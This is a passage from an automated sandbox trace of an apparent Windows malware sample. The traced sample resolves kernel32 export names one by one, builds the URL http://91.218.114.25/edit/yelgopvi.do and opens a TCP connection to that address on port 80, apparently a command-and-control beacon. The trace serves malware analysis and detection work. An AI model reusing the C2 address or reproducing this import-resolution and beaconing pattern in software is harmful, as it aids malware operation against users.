| out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0178.994] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0178.994] lstrlenA (lpString="DELETEFILEW") returned 11 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0178.994] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0178.994] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0178.994] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0178.994] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0178.994] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0178.995] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0178.995] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0178.995] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0178.995] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0178.995] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0178.995] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0178.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0178.995] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0178.995] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0178.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0178.995] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0178.995] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0178.995] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0178.995] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0178.995] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0178.995] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0178.995] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0178.995] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0178.995] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0178.995] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0178.996] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0178.996] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0178.996] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0178.996] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0178.996] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0178.996] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0178.996] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0178.996] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0178.996] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0178.996] lstrcpyA (in: lpString1=0x31cec6c, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0178.996] wsprintfA (in: param_1=0x5c0000, param_2="http://%s%s" | out: param_1="http://91.218.114.25/edit/yelgopvi.do") returned 37 [0178.996] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x610000 [0178.997] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x620000 [0178.997] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x630000 [0178.997] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x4) returned 0x640000 [0178.997] inet_pton (in: Family=2, pszAddrString="91.218.114.25", pAddrBuf=0x31cf30c | out: pAddrBuf=0x31cf30c) returned 1 [0178.997] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x31cf758 | out: lpWSAData=0x31cf758) returned 0 [0179.001] socket (af=2, type=1, protocol=6) returned 0x218 [0179.004] inet_addr (cp="91.218.114.25") returned 0x1972da5b [0179.004] htons (hostshort=0x50) returned 0x5000 [0179.004] connect (s=0x218, name=0x31cf2e8*(sa_family=2, sin_port=0x50, sin_addr="91.218.114.25"), namelen=16) returned 0 [0179.065] lstrlenA (lpString="kernel32.dll") returned 12 [0179.065] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0179.065] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0179.065] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0179.065] lstrcpyA (in: lpString1=0x31ce648, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0179.065] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0179.065] lstrcpyA (in: lpString1=0x31ce648, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0179.065] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0179.066] lstrlenA (lpString="ADDATOMA") returned 8 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0179.066] lstrlenA (lpString="ADDATOMW") returned 8 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0179.066] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0179.066] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0179.066] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0179.066] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0179.066] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0179.066] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0179.066] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0179.066] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0179.066] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0179.066] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0179.066] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0179.066] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.066] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.066] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.066] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.066] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.066] lstrcpyA (in: lpString1=0x31ce648, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.067] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.067] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.067] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.067] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.067] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.067] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.067] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.067] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.067] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.067] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.067] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.067] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.067] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.067] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.067] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.067] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.067] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.067] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.067] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.067] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.068] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.068] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.068] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.068] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.068] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.068] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.068] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.068] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.068] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.068] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.068] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.068] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.068] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.068] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.068] lstrlenA (lpString="BEEP") returned 4 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.068] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.068] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.068] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.068] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.069] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.069] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.069] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.069] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.069] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.069] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.069] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.069] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.069] lstrlenA (lpString="CANCELIO") returned 8 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.069] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.069] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.069] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.069] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.069] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.069] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.069] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.069] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.069] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.069] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.069] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.070] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.070] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.070] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.070] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.070] lstrcpyA (in: lpString1=0x31ce648, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.070] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.070] lstrcpyA (in: lpString1=0x31ce648, 